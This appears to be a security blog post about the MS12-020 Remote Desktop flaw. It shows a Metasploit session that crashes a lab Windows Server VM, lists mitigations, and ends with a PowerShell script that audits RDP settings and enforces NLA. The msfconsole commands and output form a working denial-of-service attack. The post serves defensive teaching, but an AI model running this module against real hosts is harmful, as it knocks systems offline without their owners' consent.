By now, if you have been paying attention to your news reader, Google+ or Twitter feed, you will have noticed that Microsoft released a patch for a nasty denial of service (DoS) vulnerability. Here is a bit of information about the vulnerability: “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”
In short, the system would crash with a “blue screen of death”, causing it to reboot. The other vulnerability would allow an attacker to achieve remote code execution on the affected system. Even though this patch was released over two weeks ago, most organizations are still vulnerable, and that is not because they choose to be; most places have a “patch cycle” that requires extensive testing prior to deployment.
- Linux (SolusOS)
- VirtualBox VM running Windows Server 2008 (with RDP enabled)
Launch msfconsole and follow the steps outlined here:
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3389             yes       The target port
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf auxiliary(ms12_020_maxchannelids) > run
[*] 192.168.2.10:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 - 210 bytes sent
[*] 192.168.2.10:3389 - Checking RDP status...
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed
RHOST = the target host running a vulnerable version of RDP
Mitigation:
- If you don’t need RDP exposed to the outside world, disable it
- Change the default port; everyone knows it is 3389
- Enable Network Level Authentication (NLA)
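The following PowerShell script is an added example, not part of the original post, that audits a Windows host against the three mitigations above and reports whether the MS12-020 update is installed. It assumes it runs locally with administrator rights, that the standard Terminal Server registry keys are in use, and that the caller supplies the KB number of the MS12-020 update via the -PatchKb parameter (the placeholder below is not a real KB id; take the number from the Microsoft bulletin). The -Fix switch is a hypothetical option that applies only the NLA change.

```powershell
# Added example (not from the original post): audit a host for the MS12-020
# mitigations listed above and optionally enforce NLA.
# Assumptions: run as administrator on the host being checked; the KB id of
# the MS12-020 update is passed in (placeholder default, not a real id).
param(
    [string]$PatchKb = 'KB<MS12-020-update-id>',   # placeholder: use the KB from the bulletin
    [switch]$Fix                                   # apply the NLA setting if it is missing
)

$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpKey = "$tsKey\WinStations\RDP-Tcp"

$ts  = Get-ItemProperty -Path $tsKey
$rdp = Get-ItemProperty -Path $rdpKey

# fDenyTSConnections = 0 means Remote Desktop connections are accepted.
$rdpEnabled = ($ts.fDenyTSConnections -eq 0)
# PortNumber is the TCP port the RDP-Tcp listener binds (3389 by default).
$port       = $rdp.PortNumber
# UserAuthentication = 1 means NLA is required before a session is created.
$nla        = ($rdp.UserAuthentication -eq 1)
# Get-HotFix returns nothing when the update is not installed.
$patched    = [bool](Get-HotFix -Id $PatchKb -ErrorAction SilentlyContinue)

$findings = @()
if ($rdpEnabled -and -not $patched) { $findings += "RDP enabled and $PatchKb not installed" }
if ($rdpEnabled -and $port -eq 3389) { $findings += 'RDP listening on the default port 3389' }
if ($rdpEnabled -and -not $nla)      { $findings += 'Network Level Authentication not required' }

[pscustomobject]@{
    ComputerName = $env:COMPUTERNAME
    RdpEnabled   = $rdpEnabled
    Port         = $port
    NlaRequired  = $nla
    Patched      = $patched
    Findings     = ($findings -join '; ')
}

# Remediation for the NLA finding: require authentication before session setup
# so unauthenticated clients never reach the vulnerable channel-handling code.
if ($Fix -and $rdpEnabled -and -not $nla) {
    Set-ItemProperty -Path $rdpKey -Name UserAuthentication -Value 1 -Type DWord
    Write-Output 'UserAuthentication set to 1 (NLA required); restart the Remote Desktop service or reboot to apply.'
}
```

Run it as .\Check-Ms12020.ps1 -PatchKb KB<id> to report, and add -Fix to enforce NLA. Of the three mitigations, NLA is the one that actually removes the unauthenticated attack surface, because the crafted packets must be sent before authentication and NLA moves authentication ahead of session setup; moving the port off 3389 only reduces noise from scanners, and disabling RDP or blocking it at the perimeter is the only option that helps on systems that cannot use NLA.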
http://isc.sans.edu/diary.html?storyid=12808
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids
http://technet.microsoft.com/en-us/library/cc732713.aspx